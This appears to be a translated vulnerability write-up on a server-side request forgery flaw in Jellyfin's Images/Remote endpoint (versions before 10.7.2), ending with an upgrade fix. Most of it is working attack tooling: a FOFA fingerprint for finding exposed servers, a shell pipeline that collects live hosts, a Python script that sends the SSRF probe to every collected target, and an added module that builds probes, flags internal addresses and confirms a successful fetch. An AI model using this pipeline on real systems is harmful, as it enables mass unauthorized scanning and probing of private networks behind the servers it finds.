Vulnerability Introduction
Jellyfin is a free software media system that lets you manage and stream your own media. It is an alternative to the proprietary Emby and Plex, serving media from dedicated servers to end-user devices through a range of client applications. Jellyfin descends from Emby 3.5.2 and was ported to .NET Core for full cross-platform support. There are no strings attached, just a team that wants to build something better and works together to make the best media system available to everyone.
Jellyfin's RemoteImageController.cs contains a server-side request forgery (SSRF) vulnerability: the Images/Remote endpoint fetches whatever URL is passed in its imageUrl parameter, so a crafted request makes the server issue requests on the attacker's behalf and can be used to probe hosts on the internal network.
Affected Versions
Jellyfin < 10.7.2
Vulnerability Reproduction
The FOFA search fingerprint is "Jellyfin" && port="8096"; use the FOFA collection tool (Fofa collection tool.exe) to collect matching assets in bulk.
The collected assets are saved to result.csv in the same directory.
Extract the host column (IP or domain name) from the CSV with a shell one-liner and pipe it through httpx, which keeps only the hosts that answer over HTTP and writes them one URL per line, scheme included:
cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt
Then run the following Python script to check the collected targets in bulk.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# verify=False on self-signed Jellyfin instances would otherwise print a warning per request
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def Jellyfin():
    with open("Jellyfin.txt") as file:
        for line in file:
            # httpx writes one URL per line; drop the trailing newline before appending the path
            base = line.strip()
            if not base:
                continue
            vuln_url = base + "/Images/Remote?imageUrl=http://www.baidu.com"
            try:
                response = requests.get(url=vuln_url, verify=False, timeout=10)
                # A 200 here only means the server accepted the request; an unrelated 200 page
                # matches too, so confirm hits manually before reporting them
                if response.status_code == 200:
                    print(vuln_url)
            except Exception as e:
                # Unreachable hosts and timeouts are skipped; uncomment to see why
                # print(e)
                continue


def main():
    Jellyfin()


if __name__ == '__main__':
    main()
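As an added example (not code from the original page or from the Jellyfin project), the following Python module reproduces the verification procedure above offline: it pulls the host column from a constructed result.csv in the layout the awk step assumes, builds the Images/Remote probe with the target URL-encoded so that characters like & cannot break out of the imageUrl parameter, flags which probe targets are internal addresses, and classifies a response more strictly than the 200-only check in the script, treating a relayed image body as confirmation that the server actually fetched the target. The CSV layout, the sample hosts and responses, and the assumption that the endpoint relays the fetched bytes and their Content-Type are all assumptions made for this example.

```python
import csv
import io
import ipaddress
from urllib.parse import urlencode

# Constructed sample in the layout this page's pipeline assumes for result.csv:
# the second column holds host:port, which is what the awk step prints.
SAMPLE_RESULT_CSV = """title,host,ip,port
Jellyfin,203.0.113.10:8096,203.0.113.10,8096
Jellyfin,media.example.test:8096,198.51.100.7,8096
Jellyfin,,,
"""

# Magic bytes of the image formats a relayed remote image is most likely to carry
IMAGE_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"GIF8")


def hosts_from_csv(text, column=1):
    """Equivalent of awk -F "," '{print $2}' minus the header row: return the
    non-empty values of one column (default: the second)."""
    rows = list(csv.reader(io.StringIO(text)))
    return [r[column].strip() for r in rows[1:] if len(r) > column and r[column].strip()]


def build_probe_url(base_url, target):
    """Build the Images/Remote request for one host. The target is URL-encoded so
    that '&', '#' or spaces in it cannot break out of the imageUrl parameter."""
    base = base_url.strip().rstrip("/")
    if "://" not in base:
        base = "http://" + base   # httpx output carries a scheme; raw CSV hosts do not
    return f"{base}/Images/Remote?{urlencode({'imageUrl': target})}"


def is_internal_address(host):
    """True for loopback, RFC 1918 and link-local literals, i.e. the targets that
    make an SSRF probe reach past the perimeter. Hostnames are not resolved here."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def classify_response(status_code, headers, body):
    """Interpret one probe response. HTTP 200 alone is weak evidence, because an
    unrelated 200 page matches it too; a relayed image (Content-Type image/* or
    image magic bytes) shows the server actually fetched the target. This assumes
    the endpoint relays the fetched bytes and content type (assumption)."""
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    looks_like_image = ctype.startswith("image/") or body.startswith(IMAGE_MAGIC)
    if status_code == 200 and looks_like_image:
        return "fetched"          # target reached and content relayed: confirmed SSRF
    if status_code == 200:
        return "unconfirmed"      # 200 without image content: inspect manually
    if status_code in (401, 403):
        return "auth-required"    # endpoint exists but is not reachable unauthenticated
    return "no-fetch"             # other 4xx/5xx: unreachable target, missing endpoint, or error


def demo():
    """Offline walk-through: probe URLs for the sample hosts, then verdicts for
    three constructed responses. Returns (probes, verdicts) so the logic is checkable."""
    probes = [build_probe_url(h, "http://www.baidu.com") for h in hosts_from_csv(SAMPLE_RESULT_CSV)]
    constructed_responses = [
        (200, {"Content-Type": "image/png"}, b"\x89PNG\r\n\x1a\n"),           # relayed image
        (200, {"Content-Type": "text/html; charset=utf-8"}, b"<!DOCTYPE html>"),  # generic page
        (401, {}, b""),                                                      # auth wall
    ]
    verdicts = [classify_response(*r) for r in constructed_responses]
    return probes, verdicts


if __name__ == "__main__":
    probes, verdicts = demo()
    for p in probes:
        print("probe:", p)
    for v in verdicts:
        print("verdict:", v)
```

When pointing the probe at internal targets (for example an address for which is_internal_address returns True), compare the verdicts for a host you expect to exist and one you expect not to exist; a "fetched" or a differing error for the two is the signal that the server, not your client, is doing the fetching.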
Vulnerability Fix
Upgrade Jellyfin to 10.7.2 or later.
Reference Links
For information about SSRF vulnerabilities, you can refer to this blog post: